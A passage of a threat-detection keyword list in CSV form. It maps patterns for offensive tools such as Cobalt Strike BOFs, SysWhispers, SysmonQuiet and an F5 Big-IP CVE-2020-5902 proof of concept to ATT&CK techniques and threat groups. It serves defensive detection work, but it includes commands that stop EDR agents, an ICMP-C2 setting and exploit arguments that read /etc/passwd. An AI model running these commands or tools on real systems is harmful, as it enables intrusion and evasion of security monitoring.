APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls-asm.h*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syscallsdump.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsinject.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsspawn.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallStuff.asm*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*sysctl -w net.ipv4.icmp_echo_ignore_all=1*,greyware_tool_keyword,sysctl,Disable echo reply for icmpsh C2,T1040 - T1095 - T1090.001,TA0010 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,0,N/A,4,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*sysdream/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*Sysmon is being suffocated*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*Sysmon is quiet now!*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*sysmonquiet.*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*SysmonQuiet-main*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*SySS-Research*,offensive_tool_keyword,Github Username,github repo Open source IT security software tools and information and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SySS-Research,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SySS-Research/Seth*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,1,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*system rm -f /current/tmp/ftshell.latest*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/Aomain Admins*,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*SYSTEM\CurrentControlSet\Services\dcrypt*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*System32fileWritePermissions.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*systemctl disable cbdaemon*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl disable falcon-sensor.service*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl start nessusd*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*systemctl stop cbdaemon*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl stop falcon-sensor.service*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*SysWhispers.git *,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,0,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syswhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syswhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*syswhispers.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*syswhispers.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*syswhispers.py*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*SysWhispers2*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*syswhispersv2_x86*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*-t * -x lfr -f /etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,0,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*-t * -x rce -a list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,0,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*T0XlCv1.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*t3l3machus/BabelStrike*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*t3l3machus/Synergy-httpx*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*TailorScan.exe *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_darwin*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_freebsd*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_linux_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_netbsd_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_openbsd_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 